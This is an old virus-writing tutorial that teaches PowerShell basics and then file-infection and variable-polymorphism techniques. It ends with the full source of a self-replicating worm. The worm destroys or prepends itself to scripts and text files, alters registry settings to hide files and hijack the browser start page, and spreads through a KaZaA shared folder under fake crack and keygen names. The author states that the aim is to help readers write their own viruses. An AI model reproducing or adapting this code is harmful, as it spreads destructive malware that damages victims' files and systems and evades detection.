|| Author: sk0r,Czybik/EOF || Back to articles ||

|1: What is PowerShell?                   |+
|2: About this tutorial                   |+
|3: First commands                        |+
|4: Infection methods                     |+
|5: Polymorphism                          |+
|6: Source code Bat/Polymsh.A             |+
|7: About me                              |+

|Author: sk0r/Czybik                                  |+
|Translated by: SkyOut                                |+

|www.sk0r-czybik.de.vu                                |+
|www.eof-project.net                                  |+


|1: What is PowerShell?|

PowerShell is the powerful script interpreter of Microsofts Windows Vista. Windows
Vista is the following operating system after Windows XP. It has not been released
yet, but this will change soon. Powershell is a following version of 4nt.exe,
command.exe and cmd.exe. It is also called Monad (MSH). With the PowerShell a new era
started. The syntax is similar to the one of PHP, you can code complex scripts, accessing
ActiveX objects or the .Net framework. To use the PowerShell on Windows XP you need
the .Net framework version 2.0. Its complexity allows us to code malware for it ;)
Until now there have been only small viruses, not more then PoCs, but from time to time
(and with the release of Windows Vista) we will see more and more powerful viruses for it,
I am sure.

|2: About this tutorial|

In this tutorial I will teach you the basics of PowerShell coding and I will show you
techniques like polymorphic variable changing, I found out some days ago :). Then I will
give you some tips and tricks, making our virus complete :D. At the end you will find
the source code of Bat/Polymsh.A, also called Perl/Cinepik or PHP/Polymsg.G!
(It is the first polymorphic Windows Vista worm). I wrote this tutorial to give others
basic ideas about PowerShell scripting. When you are finished with reading you should
be able to write own Windows Vista viruses.

|3: First commands|

In the following part I will show you the syntax of the PowerShell, with some example
codes. This should be enough, as i said, it is like PHP.

Text output:

|                                                                            |
|echo "Hello world!";                                                        |
|echo 'Hello world'; #You can use this as quotes, too.                       |
|write "Hello world!";                                                       |
|write-output "Hello world!";                                                |
|write-warning "Hello world!";                                               |
|                                                                            |

As you can see there are several commands for text output. It does not matter which
quotes you are using. Comments are initialized by "#". "Echo" is the same as "write"
or "write-output", "write-warning" will put out a warning message, the text will be
coloured yellow, with the text "Warning:" in front of it.


|                                                 |
|$aa = "String";                                  |
|$bb = "Hello, how are u?";                       |
|$cc = "24";                                      |
|$dd = 1337;                                      |
|$44 = "I am a number";                           |
|                                                 |

Well, look at it and you will recognize, that it is exactly the same as in every other
language, only one difference: You can use numbers as variables, that's not the
case in every language.


|                                                                                  |
|#FOR-LOOP: for ($i = 1; $i -lt 10; $i++) { #Some code }                           |
|#FOR-EACH-Loop: foreach ($number in $list) { #Some code }                         |
|#WHILE-Loop: while ($number -eq 2) { #Some code }                                 |
|#IF-Function: if ($var -eq "hello") { echo "$var is exactly hello"; }             |
|                                                                                  |


A procedure has the following structure:

|                                                 |
|function MyFunction($var)                        |
|{                                                |
|#Some code                                       |
|}                                                |
|                                                 |

You could also do this without "$var" if you don't want to hand over a variable.
Write some code, that should only be executed, when a special event occurs in such
a function. You can call this function just by writing its name.


|                                                 |
|#Operators to compare values:                    |
|-eq = equal                                      |
|-lt = less then                                  |
|-le = less or equal                              |
|-ne = not equal                                  | 
|-gt = greater then                               |
|-ge = greater or equal                           |
|                                                 |
|#Arith. operators:                               |
|+ = add.                                         |
|- = sub.                                         |
|* = multi.                                       |
|/ = div.                                         |
|                                                 |

That should be enough for the moment, you should be able to write some scripts now.

|4: Infection methods|

Now we will learn to write our first viral codes. In the following example we want
to get the path+name+extension of our virus:

|                                                                                                         |
|# First we want to get the path to our virus:                                                            |
|$gtMshFiles = get-childitem *.msh; # Listing of all *.msh files in the folder                            |
|foreach ($MshDatei in $gtMshFiles)                                                                       |
|{ if ($MshDatei.length -eq 245) # We have a size of 245 bytes                                            |
|{                                                                                                        |
|$ScriptName = $MshDatei.name                                                                             |
|}                                                                                                        |
|}                                                                                                        |
|# Here we will check every Msh file if it is 245 bytes big                                               |
|# If this is the case this should be our virus                                                           |
|# so we write the path, name and extension into some variable                                            |
|                                                                                                         |
|# Another way would be:                                                                                  |
|#sk0rCzybik                                                                                              |
|$gtMshFiles = get-childitem *.msh                                                                        |
|foreach ($MshDatei in $gtMshFiles)                                                                       |
|{                                                                                                        |
|$cont = get-content $MshDatei.name                                                                       |
|if ($cont[2] -eq "#sk0rCzybik")                                                                          |
|{                                                                                                        |
|$ScriptName = $MshDatei.name                                                                             |
|}                                                                                                        |
|}                                                                                                        |
|# Here we open and read every Msh file in the folder                                                     |
|# Via an IF-Function we check if #sk0rCzybik is in line 2                                                |
|# If this is the case, this must be our virus -> save into variable                                      |
|                                                                                                         |
|Now we want to overwrite all Msh files with our virus:                                                   |
|                                                                                                         |
|$VictimMshs = get-childitem *.msh                                                                        |
|$VirCont = get-content $ScriptName                                                                       |
|foreach ($Victim in $VictimMshs)                                                                         |
|{                                                                                                        |
|echo $VirCont >> $Victim.name                                                                            |
|}                                                                                                        |
|# Here we write the virus code into every Msh file in the current folder                                 |
|                                                                                                         |
|# Now we want to write our virus code on first place:                                                    |
|$VictimMshs = get-childitem *.msh                                                                        |
|$VirCont = get-content $ScriptName                                                                       |
|foreach ($Victim in $VictimMshs)                                                                         |
|{                                                                                                        |
|$VicCont = get-content $Victim.name                                                                      |
|del $Victim.name                                                                                         |
|echo $VirCont >> $Victim.name                                                                            |
|echo $VicCont >> $Victim.name                                                                            |
|}                                                                                                        |
|# We open every Msh file and read it                                                                     |
|# We delete it, create a new one with our virus code and append                                          |
|# the old code                                                                                           |
|                                                                                                         |
|# Now we want to infect other files too and make them Msh files                                          |
|$allfiles = get-content *.*                                                                              |
|foreach ($Victim in $allfiles)                                                                           |
|{                                                                                                        |
|if ($Victim = "HTML")                                                                                    |
|{                                                                                                        |
|$normname = $allfiles.name                                                                               |
|$withext = $normalname + ".msh"                                                                          |
|del $Victim.name                                                                                         |
|echo $virCont >> $Victim.Name                                                                            |
|rename-item "$allfiles" $withext                                                                         |
|}                                                                                                        |
|}                                                                                                        |
|# If we find a HTML file in the folder, then the forst variable saves the path                           |
|# to it, the second one saves it and the extension .msh, you have to do it like this                     |
|# otherwise you will get errors. The file will be deleted, the virus code written                        |
|# into the new created file and the extension will be changed to .msh via                                |
|# Rename-Function                                                                                        |
|                                                                                                         |

|5: Polymorphism|

It's always challenging for virus writers to make it difficult to detect their creations.
This can be done with polymorphism, permutation or metamorphism. Until now this has not
been done for the PowerShell, if I'm right, but I found a way to change variables in
every infected file. Only luck of course. So we see, variable polymorphism is possible ;)
I did the first stop, now it must be improved. Its nothing complicate, with the random
number generator all is done quickly, but there is no function (I don't know one,
yet) to change numbers into signs (ASCHII), so you have to write an own IF-Function.
Anyway, it's not bad. Now a little examaple for variable polymorphism:

|                                                                                                                                     |
|$ArrayVars = ("Varia","sabba","hallo","nocheinname") ; #Array with variables to change foreach ($StringsToPoly                       |
|in $ArrayVars) # For every string in ArrayVars --> execute loop { for ($i = 0; $i -le $StringsToPoly.length; $i++) #                 |
|$i = 0, smaller then length of string, increased by 1 all the time { $intRandomNumb = (new-object Random).next(1*27) ;               |
|#Generate random number between 0 and 26. if ($intRandomNumb -eq 0) { $AscString = $AscString + "a"; #ir random number               |
|is 0 then $AscString = $AscString with "a" being append } elseif ($intRandomNumb -ne 0) # etc... { $AscString =                      |
|$AscString + ""; } if ($intRandomNumb -eq 1) { $AscString = $AscString + "b"; } elseif ($intRandomNumb -ne 1) {                      |
|$AscString = $AscString + ""; } if ($intRandomNumb -eq 3) { $AscString = $AscString + "c"; } elseif ($intRandomNumb                  |
|-ne 3) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 4) { $AscString = $AscString + "d"; } elseif                         |
|($intRandomNumb -ne 4) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 5) { $AscString = $AscString + "e";                  |
|} elseif ($intRandomNumb -ne 5) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 6) { $AscString = $AscString                |
|+ "f"; } elseif ($intRandomNumb -ne 6) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 7) { $AscString =                    |
|$AscString + "g"; } elseif ($intRandomNumb -ne 7) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 8) {                      |
|$AscString = $AscString + "h"; } elseif ($intRandomNumb -ne 8) { $AscString = $AscString + ""; } if ($intRandomNumb                  |
|-eq 9) { $AscString = $AscString + "i"; } elseif ($intRandomNumb -ne 9) { $AscString = $AscString + ""; } if                         |
|($intRandomNumb -eq 10) { $AscString = $AscString + "j"; } elseif ($intRandomNumb -ne 10) { $AscString = $AscString                  |
|+ ""; } if ($intRandomNumb -eq 11) { $AscString = $AscString + "k"; } elseif ($intRandomNumb -ne 11) { $AscString =                  | 
|$AscString + ""; } if ($intRandomNumb -eq 12) { $AscString = $AscString + "l"; } elseif ($intRandomNumb -ne 12) {                    |
|$AscString = $AscString + ""; } if ($intRandomNumb -eq 13) { $AscString = $AscString + "m"; } elseif                                 |
|($intRandomNumb -ne 13) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 14) { $AscString = $AscString +                     |
|"n"; } elseif ($intRandomNumb -ne 14) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 15) { $AscString =                    |
|$AscString + "o"; } elseif ($intRandomNumb -ne 15) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 16) {                    |
|$AscString = $AscString + "p"; } elseif ($intRandomNumb -ne 16) { $AscString = $AscString + ""; } if                                 |
|($intRandomNumb -eq 17) { $AscString = $AscString + "q"; } elseif ($intRandomNumb -ne 17) { $AscString = $AscString                  |
|+ ""; } if ($intRandomNumb -eq 18) { $AscString = $AscString + "r"; } elseif ($intRandomNumb -ne 18) { $AscString =                  |
|$AscString + ""; } if ($intRandomNumb -eq 19) { $AscString = $AscString + "s"; } elseif ($intRandomNumb -ne 19) {                    |
|$AscString = $AscString + ""; } if ($intRandomNumb -eq 20) { $AscString = $AscString + "t"; } elseif ($intRandomNumb                 |
|-ne 20) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 21) { $AscString = $AscString + "u"; } elseif                       |
|($intRandomNumb -ne 21) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 22) { $AscString = $AscString +                     |
|"v"; } elseif ($intRandomNumb -ne 22) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 23) { $AscString =                    |
|$AscString + "w"; } elseif ($intRandomNumb -ne 23) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 24) {                    |
|$AscString = $AscString + "x"; } elseif ($intRandomNumb -ne 24) { $AscString = $AscString + ""; } if                                 |
|($intRandomNumb -eq 25) { $AscString = $AscString + "y"; } elseif ($intRandomNumb -ne 25) { $AscString = $AscString                  |
|+ ""; } if ($intRandomNumb -eq 26) { $AscString = $AscString + "z"; } elseif ($intRandomNumb -ne 26) { $AscString =                  |
|$AscString + ""; } } $ContentOfMyWorm = $ContentOfMyWorm.replace($StringsToPoly,$AscString); # Write old variables                   |
|werden min new ones. Remove-Variable AscString #AscString will be removed for every string otherwise variable                        |
|would become bigger and bigger. }                                                                                                    |
|                                                                                                                                     |

You see, its quite easy. Just cost me some days because I did not know the commands
and first had to try them ^^. All in all its easy. If you find new ways making the
detection more difficult, please mail me. Would be nice to see.

|6: Source code Bat/Polymsh.A|

That's the first polymorphic worm for Windows Vista, it took me several days to do it:

|                                                                                                                                                                               |
|< ? ############################################################################ # # # sk0r alias Czybik PowerShell Variable Poly                                              |
|Worm # # =============================================== # # # # About how to contact sk0r alias Czybik: # #                                                                   |
|----------------------------------------- # # Email-Address: sk0r1337@gmx.de # # Homepages: www.sk0r-scripts.tk - www.sk0r-virii.tk - www.czybik-kit.tk                        |
|# # Irc-Channel: #vx-lab or #vxers @ undernet # # # # Informations about this worm : # # ------------------------------ # # This is the first PowerShell                       |
|Worm which changes it # # variable names everytime the worm runs. # # The worm uses the two Objects (WScript.Shell # # and                                                     |
|Scripting.FileSystemObject ) # # So this worm does the followthing explained shortly: # # - Spreads per P2P Client KaZaA Lite # # - Modifies some                              |
|Registry values # # - Change specific variables in the code in an array # # - Overwrites .msh, .bat, .cmd, .log, .ini, .txt, .ps1, .js or .html files# # -                     |
|overwritten .msh or .ps1 files have our source at first and the file # # source at second place. the other files listed above will be # # overwritten. the                     |
|extension will be changed to .msh # # - The payload, a info message, will appear if the time is greater # # then 17:00:00. It will show informations # #                       |
|# # Structure of the worm: # # ----------------------- # # [Code] # # 'explanation # # # # Note: Sorry about my bad english # # If I would explain this in                     |
|german everybody would understand # # better. But I decided to comment the worm in english, because # # everybody who codes in PowerShell can                                  |
|read and learn # # form this worm. I needed some days do made this worm. because I # # had no tutorials I had to find out the most commands                                    |
|myself. # # So please email me, what you think of this worm # # #                                                                                                              |
|############################################################################ # $fso = New-Object -Com                                                                          |
|Scripting.FileSystemObject ; $sysdir = $fso.GetSpecialFolder(1) ; $wshs = New-Object -Com WScript.Shell ; $ArrayVars =                                                         |
|("fso","wshs","ArrayVars","sysdir","gtFileSize","AllMshDateinCurDir","KazaaDir","gtMySelfToCopy","NormalName",                                                                 |
|"intHomepage","strHomepage","PowerShellScript","MySelfWorm","ContentOfMyWorm","StringsToPoly","PolymorphicPowerShell","EndName",                                               |
|"gtFilesToInfect","InfectAllFilesNow","gtCurrentDate","intRandomNumb","AscString","VictimDateien","gtvicpscon","gtvicmshcon") ;                                                |
|$gtFileSize = 14370 ; $AllMshDateinCurDir = get-childitem *.msh ; # here we declare five variables. $fso creates the # Scripting.FileSystemObject.                             |
|the $wshs creates # the WScript.Shell Object. The Variable $ArrayVars # contains all variable names we want to change by each run # $gtFileSize                                |
|contains the file size as integer # $AllMshDateinCurDir contains all msh files in current direcory #                                                                           |
|======================================================= $intHomepage = (new-object Random).Next(1*3) if                                                                        |
|($intHomepage -eq 0) { $strHomepage = "http://www.sk0r-scripts.tk"; } elseif ($intHomepage -eq 1) { $strHomepage = "http://www.sk0r-virii.tk"; }                               |
|elseif ($intHomepage -eq 2) { $strHomepage = "http://www.czybik-kit.tk"; } # Here we create a random number from 1 till 3. # for each value the                                |
|variable $strHomepages # contains a other homepage address # ===========================================                                                                       |
|$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD");                                                        |
|$wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD");                                                   |
|$wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "Infected                                                             |
|Poly","REG_SZ"); $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner",                                                             |
|"sk0rCzybik","REG_SZ"); $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected by a poly                                         |
|ps worm","REG_SZ"); $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "$strHomepage") # Here                                            |
|we write some registry values to the # system registry. Our homepage address will # be adden, too. After changing the values the # user cant see                               |
|hidden files and file extensions. # the registered organisation will be changed to # Infected Poly, the registered owner will be changed # to sk0rCzybik                       |
|and the Title of the internet explorer # will be changed to Infected by a poly ps worm foreach ($PowerShellScript in $AllMshDateinCurDir) { if                                 |
|($PowerShellScript.Length=$gtFileSize) { $MySelfWorm = $PowerShellScript.Name; } } # this loop checks all msh files in the current directory # if a                            |
|files exists with our searched file size, the # variable $MySelfWorm contains the path and the name # to our worm #                                                            |
|=================================================== $opnMyForRead = $fso.OpenTextFile($MySelfWorm,1) ;                                                                         |
|$ContentOfMyWorm = $opnMyForRead.ReadAll() ; $opnMyForRead.Close() ; # Here we open the worm (the file itself) for reading. # the whole                                        |
|worm content will be contented by the # variable $ContentOfMyWorm. After that # we close our worm (the file itself). #                                                         |
|==================================== $gtFilesToInfect = get-childitem *.* foreach ($VictimDateien in $gtFilesToInfect) {                                                       |
|foreach ($StringsToPoly in $ArrayVars) { for ($i = 0; $i -le $StringsToPoly.length; $i++) { $intRandomNumb = (new-object Random).next(1*27) ; if                               |
|($intRandomNumb -eq 0) { $AscString = $AscString + "a"; } elseif ($intRandomNumb -ne 0) { $AscString = $AscString + ""; } if ($intRandomNumb                                   |
|-eq 1) { $AscString = $AscString + "b"; } elseif ($intRandomNumb -ne 1) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 3) { $AscString                               |
|= $AscString + "c"; } elseif ($intRandomNumb -ne 3) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 4) { $AscString = $AscString +                                    |
|"d"; } elseif ($intRandomNumb -ne 4) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 5) { $AscString = $AscString + "e"; } elseif                                     |
|($intRandomNumb -ne 5) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 6) { $AscString = $AscString + "f"; } elseif ($intRandomNumb                                   |
|-ne 6) { $AscString = $AscString + ""; } if ($intRandomNumb -eq 7) { $AscString = $AscString + "g"; } elseif ($intRandomNumb -ne 7) { $AscString                               |
|= $AscString + ""; } if ($intRandomNumb -eq 8) { $AscString = $AscString + "h"; } elseif ($intRandomNumb -ne 8) { $AscString = $AscString + "";                                |
|} if ($intRandomNumb -eq 9) { $AscString = $AscString + "i"; } elseif ($intRandomNumb -ne 9) { $AscString = $AscString + ""; } if                                              |
|($intRandomNumb -eq 10) { $AscString = $AscString + "j"; } elseif ($intRandomNumb -ne 10) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 11) { $AscString = $AscString + "k"; } elseif ($intRandomNumb -ne 11) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 12) { $AscString = $AscString + "l"; } elseif ($intRandomNumb -ne 12) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 13) { $AscString = $AscString + "m"; } elseif ($intRandomNumb -ne 13) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 14) { $AscString = $AscString + "n"; } elseif ($intRandomNumb -ne 14) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 15) { $AscString = $AscString + "o"; } elseif ($intRandomNumb -ne 15) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 16) { $AscString = $AscString + "p"; } elseif ($intRandomNumb -ne 16) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 17) { $AscString = $AscString + "q"; } elseif ($intRandomNumb -ne 17) { $AscString = $AscString + ""; } if                                                 | 
|($intRandomNumb -eq 18) { $AscString = $AscString + "r"; } elseif ($intRandomNumb -ne 18) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 19) { $AscString = $AscString + "s"; } elseif ($intRandomNumb -ne 19) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 20) { $AscString = $AscString + "t"; } elseif ($intRandomNumb -ne 20) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 21) { $AscString = $AscString + "u"; } elseif ($intRandomNumb -ne 21) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 22) { $AscString = $AscString + "v"; } elseif ($intRandomNumb -ne 22) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 23) { $AscString = $AscString + "w"; } elseif ($intRandomNumb -ne 23) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 24) { $AscString = $AscString + "x"; } elseif ($intRandomNumb -ne 24) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 25) { $AscString = $AscString + "y"; } elseif ($intRandomNumb -ne 25) { $AscString = $AscString + ""; } if                                                 |
|($intRandomNumb -eq 26) { $AscString = $AscString + "z"; } elseif ($intRandomNumb -ne 26) { $AscString = $AscString + ""; } }                                                  |
|$ContentOfMyWorm = $ContentOfMyWorm.replace($StringsToPoly,$AscString); Remove-Variable AscString } if ($VictimDateien = "msh") {                                              |
|$gtvicmshcon = get-content $VictimDateien.name ; if ($gtvicmshcon[517] -ne "#sk0r alias Czybik") { del $VictimDateien.name ; echo                                              |
|$ContentOfMyWorm >> $VictimDateien.name ; echo $gtvicmshcon >> $VictimDateien.name ; } } if ($VictimDateien = "ps1") { $gtvicpscon =                                           |
|get-content $VictimDateien.name ; if ($gtvicpscon[517] -ne "#sk0r alias Czybik") { del $VictimDateien.name ; echo $ContentOfMyWorm >>                                          |
|$VictimDateien.name ; echo $gtvicpscon >> $VictimDateien.name ; } } if ($VictimDateien = "bat") { $NormalName = $gtFilesToInfect.name ;                                        |
|$EndName = $NormalName+".msh" ; del VictimDateien.name ; echo $ContentOfMyWorm >> VictimDateien.name ; rename-item                                                             |
|"$gtFilesToInfect" $EndName ; } if ($VictimDateien = "cmd") { $NormalName = $gtFilesToInfect.name ; $EndName = $NormalName+".msh" ;                                            |
|del VictimDateien.name ; echo $ContentOfMyWorm >> VictimDateien.name ; rename-item "$gtFilesToInfect" $EndName ; } if ($VictimDateien =                                        |
|"log") { $NormalName = $gtFilesToInfect.name ; $EndName = $NormalName+".msh" ; del VictimDateien.name ; echo $ContentOfMyWorm >>                                               |
|VictimDateien.name ; rename-item "$gtFilesToInfect" $EndName ; } if ($VictimDateien = "ini") { $NormalName = $gtFilesToInfect.name ;                                           |
|$EndName = $NormalName+".msh" ; del VictimDateien.name ; echo $ContentOfMyWorm >> VictimDateien.name ; rename-item                                                             |
|"$gtFilesToInfect" $EndName ; } if ($VictimDateien = "txt") { $NormalName = $gtFilesToInfect.name ; $EndName = $NormalName+".msh" ; del                                        |
|VictimDateien.name ; echo $ContentOfMyWorm >> VictimDateien.name ; rename-item "$gtFilesToInfect" $EndName ; } if ($VictimDateien = "js")                                      |
|{ $NormalName = $gtFilesToInfect.name ; $EndName = $NormalName+".msh" ; del VictimDateien.name ; echo $ContentOfMyWorm >>                                                      |
|VictimDateien.name ; rename-item "$gtFilesToInfect" $EndName ; } if ($VictimDateien = "html") { $NormalName = $gtFilesToInfect.name ;                                          |
|$EndName = $NormalName+".msh" ; del VictimDateien.name ; echo $ContentOfMyWorm >> VictimDateien.name ; rename-item                                                             |
|"$gtFilesToInfect" $EndName ; } } # Ok, hope I can explain this in english so you can understand :-D # The variable $gtFilesToInfect contains all                              |
|files in the current # directory. and for each file in the directory # the for each string in the variable $ArrayVars a loop appears for # each char in a                      |
|string. for each char a random number will be created # if the random number has a specific value the variable $AscString # contains a specific char.                          |
|The If Statement is arranged alphabetically. # If all chars are looped, the string will be replaced with the new random # string. This happens for all                         |
|strings in the $ArrayVars Variable. For each # string we need do delete the variable $AscString otherwise a new # variable name is too long and a it                           |
|adds each string to the next string. # In the End the variable $ContentOfMyWorm contains the new # Souce-Code with the new variable names. #                                   |
|then wee look if msh or ps1 files exists in our direcory. # if this is true we look if the file is infected. If not then # we write our worm source at the first               |
|place and then write # the normal source of the file at second place. # Then we look if .bat, .cmd, .log, .ini, .txt, .js or .html files # exists in our folder.               |
|If this is true, our worm overwrites the # the file and changes the extension to .msh #                                                                                        |
|============================================================== $crtTheNewWorm =                                                                                                |
|$fso.CreateTextFile("$sysdir\sk0rCzybik.msh"); $crtTheNewWorm.Write($ContentOfMyWorm); $crtTheNewWorm.Close(); # Here a new msh file                                           |
|with the new worm content will be created. # =====================================================                                                                             |
|$gtMySelfToCopy = $fso.getfile("$sysdir\sk0rCzybik.msh"); $KazaaDir =                                                                                                          |
|$wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir'); if ($KazaaDir -ne "") { $gtMySelfToCopy =                                                          |
|$fso.getfile($MySelfWorm) $gtMySelfToCopy.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh");                                                                            |
|$gtMySelfToCopy.copy("$KazaaDir\Windows Vista Update.msh"); $gtMySelfToCopy.copy("$KazaaDir\Ad-aware SE Personal Edition                                                       |
|1.06r1.msh"); $gtMySelfToCopy.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh"); $gtMySelfToCopy.copy("$KazaaDir\Allround WinZIP                                        |
|Key Generator.msh"); $gtMySelfToCopy.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh"); $gtMySelfToCopy.copy("$KazaaDir\Nero Burning                                           |
|Rom Crack.msh"); $gtMySelfToCopy.copy("$KazaaDir\Kaspersky KeyGen working.msh"); $gtMySelfToCopy.copy("$KazaaDir\Daemon                                               |
|Tools Install + Crack.rar.msh"); $gtMySelfToCopy.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh"); } # Here the variable Kazaa dir reads a                                  |
|registry key, which contains the # path to the My Shared Folder path. If it exists the worm copys # itself as some filenames in the My Shared Folder                           |
|Directory. # =========================================================== $gtCurrentDate = get-date                                                                             |
|-DisplayHint time if ($gtCurrentDate -gt "17:00:00") { $wshs.popup("This is the first polymorphic PowerShell Worm. This Worm was written by sk0r                               |
|alias Czybik. This Worm is ©2006 by sk0r alias Czybik To ask some questions email me @ sk0r1337@gmx.de www.sk0r-scripts.tk -                                                   |
|www.sk0r-virii.tk - www.czybik-kit.tk ",10,"PowerShell Polymorphic Worm ©2006 by sk0r alias Czybik"); } # the Variable gtCurrentDate uses the                                  |
|function get-date with parameter time # to get the current time. If the time is greater the 17:00:00 a popup # message will appear. #                                          |
|================================================================== exit ; # This command exits the                                                                             |
|script # ==================== # # This Worm is ©2006 by sk0r alias Czybik. #sk0r alias Czybik                                                                                  |
|                                                                                                                                                                               |

|7: About me|

For questions about the tutorial, the PowerShell, if you have something new and interesting
found out or if you just want to show me your sources of PowerShell worms, feel free
to mail me: sk0r1337@gmx.de or write something in my guestbook on my homepage, best regards

You can also find me in IRC: #vxers, #vx-lab and #eof-project @ Undernet